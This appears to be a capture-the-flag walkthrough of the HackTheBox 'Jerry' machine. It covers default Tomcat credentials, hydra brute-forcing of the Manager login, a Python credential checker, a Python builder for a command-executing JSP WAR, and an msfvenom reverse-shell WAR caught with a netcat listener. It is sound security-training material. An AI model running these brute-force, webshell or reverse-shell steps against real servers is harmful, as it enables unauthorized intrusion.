Hackthebox writeup for Jerry

Mind Opener

What are WAR files? If an application lets us upload one, can we craft such a file ourselves and obtain a reverse shell through it?

Reconnaissance

An Nmap scan reveals an Apache Tomcat web server listening on port 8080.

Tomcat is a Java servlet container: a web server that runs Java web applications (servlets and JSP pages), which are normally packaged and deployed as WAR files.

Open the application and click on Server Status; it asks for HTTP Basic authentication. The default credentials "admin admin" work.

Next, we click on Manager => List Applications and get an access denied (403) error instead of a login prompt.

To find out why we are getting the access denied error we intercept the request with Burp Suite.

Sending the Authorization header to Burp's Decoder shows that the browser is still submitting admin:admin (Basic auth is only base64, not encryption). Those credentials are valid, which is why Tomcat answers 403 (authenticated, but the admin user lacks the manager-gui role the Manager app requires) rather than 401, and because the browser keeps re-sending the cached header it never prompts again. If we strip the header in Burp and forward the request, Tomcat issues a fresh 401 challenge and the browser asks for a login again.

Exploitation

We'll brute-force the Manager login with hydra, using the Tomcat default-credential list from SecLists. First locate the list (run from the SecLists directory), then pass it to hydra's -C option, which takes a file of user:password pairs:

find . | grep -i tomcat
hydra -C /usr/share/seclists/Passwords/../../betterdefaultpassists.txt http-get://10.10.10.95:8080/manager/html

The pair that works is tomcat:secret.
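The troubleshooting above (a 403 means valid credentials without the manager-gui role, a 401 means rejected credentials) and the credential guessing can both be expressed as a small checker. The script below is an added example, not part of the original writeup or of hydra: it builds and decodes Basic auth headers the way Burp's Decoder does, tries a constructed candidate list against the Manager URL from the writeup, and classifies each response by status code. The network call is injectable so the logic can be exercised without a live Tomcat; the candidate pairs and the verdict labels are assumptions made for illustration.

```python
"""Tomcat Manager credential checker (added example, not from the writeup).

Verdicts follow the HTTP status Tomcat returns for /manager/html:
  401 -> credentials rejected (username/password wrong)
  403 -> credentials accepted, but the user lacks the manager-gui role
  200 -> credentials accepted and the user is authorized
"""
import base64
import urllib.error
import urllib.request

TARGET = "http://10.10.10.95:8080/manager/html"  # Manager URL from the writeup

# Constructed candidate list for illustration; a real run would read the
# SecLists Tomcat default-credential file instead.
CANDIDATES = [
    ("admin", "admin"),
    ("tomcat", "tomcat"),
    ("tomcat", "secret"),
]


def encode_basic(user, password):
    """Build the value of an HTTP Basic Authorization header."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic(header_value):
    """Reverse of encode_basic: what Burp's Decoder shows for the header."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic auth header")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def classify(status):
    """Map the status code to what it tells us about the credentials."""
    if status == 401:
        return "rejected"
    if status == 403:
        return "valid-but-unauthorized"
    if status == 200:
        return "valid-and-authorized"
    return f"unexpected-{status}"


def http_status(url, auth_header):
    """Perform the GET and return only the status code (real network I/O)."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_credentials(url, candidates, fetch=http_status):
    """Try each (user, password) pair and return {pair: verdict}.

    `fetch` is injectable so the classification logic can be tested
    offline with a fake server.
    """
    results = {}
    for user, password in candidates:
        status = fetch(url, encode_basic(user, password))
        results[(user, password)] = classify(status)
    return results


if __name__ == "__main__":
    for (user, password), verdict in check_credentials(TARGET, CANDIDATES).items():
        print(f"{user}:{password} -> {verdict}")
```

Run it against the box and a 403 row is worth as much as a 200 one: it tells you the account exists and its password is right, only the role is missing, which is exactly what happened with admin:admin.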

This gets us into the Manager application, which has an option to upload and deploy a WAR file. Can we use this kind of file upload to get a reverse shell?

What is a war file

A WAR file (Web Application Archive) is a ZIP-format archive used to distribute a complete Java web application: JAR files, JavaServer Pages, servlets, compiled classes, the WEB-INF/web.xml deployment descriptor and other resources. When Tomcat deploys one it unpacks it into a context named after the file, so shell.war becomes reachable under /shell/.
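To make the definition concrete, the script below builds a minimal WAR by hand and then inspects it, which is also the check worth running on a generated archive before uploading it. It is an added example, not code from the writeup or from Metasploit: the JSP it packs is a constructed one that runs whoami and prints the result (the same check the writeup performs once a shell lands), the file name cmd.jsp is an assumption, and the web.xml marks the JSP as the welcome file so that requesting the context root runs it.

```python
"""Build and inspect a minimal WAR (added example, not from the writeup).

A WAR is just a ZIP archive with a WEB-INF/web.xml descriptor; anything
else (here a single JSP) is served by Tomcat once the context is deployed.
"""
import io
import xml.etree.ElementTree as ET
import zipfile

JAVAEE_NS = "http://java.sun.com/xml/ns/javaee"

# Constructed JSP for illustration: runs `whoami` on the server and prints
# the output. A reverse-shell JSP such as msfvenom's would sit here instead.
WHOAMI_JSP = """<%@ page import="java.io.*" %>
<%
    Process p = Runtime.getRuntime().exec("whoami");
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
%>
"""


def web_xml(welcome_file):
    """Deployment descriptor naming the JSP as the welcome file, so a request
    to the context root (e.g. /shell/) runs it without knowing the JSP name."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<web-app xmlns="{JAVAEE_NS}" version="2.5">\n'
        '  <welcome-file-list>\n'
        f'    <welcome-file>{welcome_file}</welcome-file>\n'
        '  </welcome-file-list>\n'
        '</web-app>\n'
    )


def build_war(jsp_name, jsp_source):
    """Return the WAR as bytes: web.xml under WEB-INF/, the JSP at the root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", web_xml(jsp_name))
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def inspect_war(data):
    """Return (sorted member names, welcome file from web.xml).

    This is the pre-upload check: confirm the descriptor is present and
    learn which JSP to request after deployment.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as war:
        names = sorted(war.namelist())
        root = ET.fromstring(war.read("WEB-INF/web.xml"))
        welcome = root.find(f"{{{JAVAEE_NS}}}welcome-file-list/{{{JAVAEE_NS}}}welcome-file")
        return names, (welcome.text if welcome is not None else None)


if __name__ == "__main__":
    war_bytes = build_war("cmd.jsp", WHOAMI_JSP)
    with open("shell.war", "wb") as fh:
        fh.write(war_bytes)
    print(inspect_war(war_bytes))
```

Running inspect_war on an msfvenom-generated WAR shows the same layout with a randomly named JSP; the welcome-file entry tells you which path to browse to if the context root does not trigger it.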

It turns out that msfvenom can generate such WAR files directly; the -f option selects the output format, and WAR is only one of many. Below is the list of supported formats from the Offensive Security page:

root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript

Create the payload with the command below (LHOST is our own VPN address, LPORT the port our listener will wait on):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4455 -f war > shell.war

Set up a netcat listener on the same port:

nc -nlvp 4455

Upload shell.war through the Manager's "WAR file to deploy" form, then open the deployed application in the browser (http://10.10.10.95:8080/shell/). Loading the JSP triggers the connection back.

Obtain the reverse shell:

The whoami command returns output we can be very happy about: the shell already runs as the most privileged account on the box, so no privilege escalation is needed.

So we just grab the flags.

Skills that I learned from this machine

Using Burp Suite to troubleshoot an authentication failure.

Creating a JSP shell with msfvenom in WAR format and obtaining a reverse shell from it.
